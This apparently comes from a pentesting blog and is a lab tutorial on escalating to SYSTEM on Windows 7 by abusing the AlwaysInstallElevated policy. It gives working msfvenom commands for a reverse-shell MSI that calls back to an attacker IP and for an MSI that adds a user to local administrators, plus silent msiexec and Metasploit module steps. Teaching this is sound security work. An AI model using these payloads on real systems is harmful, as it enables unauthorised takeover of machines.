Categories

Archives

Privilege Escalation

Windows Privilege Escalation (AlwaysInstallElevated)

Hello Friends!! In this article, we are demonstrating the Windows privilege escalation method via the method of AlwaysInstallElevated policy. In penetration testing, when we spawn command shell as a local user, it is possible to exploit the vulnerable features (or configuration settings) of Windows Group policy, to further elevate them to admin privileges and gain the administrator access

Table of Content

  • Introduction
  • Lab setup
  • Spawn command shell as local user
  • Escalate privilege manually via .msi payload (MSfvenom)
  • Escalated privilege via Adding user Administrators Group (Msfvenom)
  • Escalate privilege via Post exploit (Metasploit)

Introduction

AlwaysInstallElevated Policy

As we all are aware that Windows OS comes installed with a Windows Installer engine which is used by MSI packages for the installation of applications. These MSI packages can be installed with elevated privileges for non-admin users

For this purpose, the AlwaysInstallElevated policy feature is used to install an MSI package file with elevated (system) privileges. This policy is enabled in the Local Group Policy editor; directs the Windows Installer engine to use elevated permissions when it installs any program on the system. This method can make a machine vulnerable posing a high-security risk because a non-administrator user can run installations with elevated privileges and access many secure locations on the computer.

Caution Note: This option is equivalent to granting full administrative rights, which can pose a massive security risk. Microsoft strongly discourages the use of this setting. Hence this should be used for the lab purposes only (and not in a Production environment)

Lab set-up

Victim’s Machine: Windows 7

Attacker’s machine: Kali Linux

To make this policy effective [i.e install a package with elevated (system) privileges], we need to ensure that victim machine is deliberately made vulnerable by enabling the AlwaysInstalledElevated Policy in the Computer Configuration and User Configuration folders of the Local Group Policy editor

For the Windows configuration 

Type gpedit.msc in the Run dialog box of the Start Menu in the Windows 7 machine and the Local Group Policy editor window prompt will open

  1. Change the settings of AlwaysInstalledElevated policy
  2. For the Computer configuration

Navigate to the below path in the Windows machine

Computer Configuration\Administrative Templates\Windows Components\Windows Installer

Enable the Always install with elevated privileges

For the User configuration 

Navigate to the below path in the Windows machine

User Configuration\Administrative Templates\Windows Components\Windows Installer

Enable the Always install with elevated privileges

This completes the lab set up on the Windows machine.N ow let’s proceed to our actual task.

Spawning Victim’s Machine

We need to compromise the Windows victim machine at least once to gain the meterpreter session. As you can observe that we already have a victim’s meterpreter session. Let’s open the msfconsole and check the existing current sessions

msfconsole
sessions

As we can see that there exists a session already with ID 1. Now let’s open the session 1 and extract the user details

meterpreter > sessions 1
meterpreter >getuid

As we can see that we are logged into this session with the username as raj.

Note: The existing user “raj” already exists in the Windows 7 victim machine and is a non-admin user

 

Now let’s open the command shell of the target machine

meterpreter >shell

Upon executing the shell command, we would land into the user’s Downloads folder C:\Users\raj\Downloads

We will now run the registry query command on this command prompt so as to verify whether the Windows installer have elevated privileges or not, as per our settings configured earlier

reg query HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer

As we can see from the output that the registry named “AlwaysInstallElevated” exists with a dword (REG_WORD) value of 0x1, which means that the AlwaysInstallElevated policy is enabled.

Privilege Escalation via .msi payload (1st Method)

Now let’s open a new terminal in Kali machine and generate an MSI Package file (1.msi ) utilizing the Windows Meterpreter payload as follows

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.120 lport=4567 -f msi > /root/Desktop/1.msi

On the existing Meterpreter session of the user, let’s upload our MSI file named 1.msi to the target machine as follows. Once it is uploaded successfully, we will then jump to the shell

upload /root/Desktop/1.msi .

Note: Before executing the MSI Package file, let’s start an MSF handler in another terminal window

(Refer to the commands for same, after the below screenshot)

Execute the MSI package file on the Windows command prompt

msiexec /quiet /qn /i 1.msi

 

/quiet = Suppress any messages to the user during installation
/qn = No GUI
/i = Regular (vs. administrative) installation

In a parallel window, we opened a new handler before executing the .msi file

msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.1.120
msf exploit(handler) > set lport 4567
msf exploit(handler) > exploit

Finally, we got the meterpreter session using this exploit!!  Let’s have further look at the details of the user privileges we gained on this system

meterpreter > getsystem
meterpreter > getuid

Fantastic!! We have rooted in the Local System account (NT AUTHORITY\SYSTEM) which has the highest level of privileges on the local system.

 

Adding user in Administrators Group (2nd Method)

In this method, we will choose a non-admin user from the existing list of users in the target machine and then try to elevate his privileges. Here we will send the relevant Windows commands (to the target machine), utilizing the windows/exec payload of the Metasploit.

First, let us check the details of existing users in the victim machine. Here we can select any user, lets; select a user named “raaz” who is a non-admin user

net user

The verification that the user name “raaz” is in the Local Users group can be done by running the following in the command prompt

net user raaz

 

Generate an MSI package (2.msi ) with the windows/exec payload, that sends a command instructing to add local admin privileges for the user “raaz”, to the target machine.

msfvenom -p windows/exec CMD='net localgroup administrators raaz /add' -f msi > /root/Desktop/2.msi

Now let’s upload the MSI file 2.msi to the target machine as follows

Note: Before uploading the MSI file, press Ctrl+Z to exit out of the victim machine’s command shell

In the meterpreter shell type

upload /root/Desktop/2.msi .

Once the MSI file is uploaded successfully, we will take the command shell and execute the installer file

shell
msiexec /quiet /qn /i 2.msi

The verification that the user name “raaz” has been added into the local administrator group can be done by running the following in the command prompt

net user raaz

As we can see from the screenshot the user raaz is now a member of Local Administrators group

Awesome !! We have got the privileges of the non-admin user escalated via using the manual exploit.

 

Privilege Escalation via Metasploit Post Exploit (3rd Method)

In order to perform the Privilege escalation abusing the AlwaysInstalledElevated policy, we can also utilize the inbuilt exploit of the Metasploit module as follows :

Now let’s use this exploit

use exploit/windows/local/always_install_elevated
msf exploit(always_install_elevated) > set session 1
msf exploit(always_install_elevated) > exploit

We got the meterpreter session using the in-built exploit as well !! Now let’s have further look at the details of the user privileges

meterpreter > getsystem
meterpreter > getuid

Hurrah!! We have rooted in the Local System account (NT AUTHORITY\SYSTEM) which has the highest level of privileges on the local system

Note: We have shown one of the methodologies to elevate the privileges.T his lab can be performed in multiple ways, as there are many other methods of performing the Windows privilege escalation.

 Author: Ankur Sachdev is an Information Security consultant and researcher in the field of Network & WebApp Penetration Testing. Contact Here

5 thoughts on “Windows Privilege Escalation (AlwaysInstallElevated)

  1. I could do an article where privilege escalation with the service path will be explained without quotes

Comments are closed.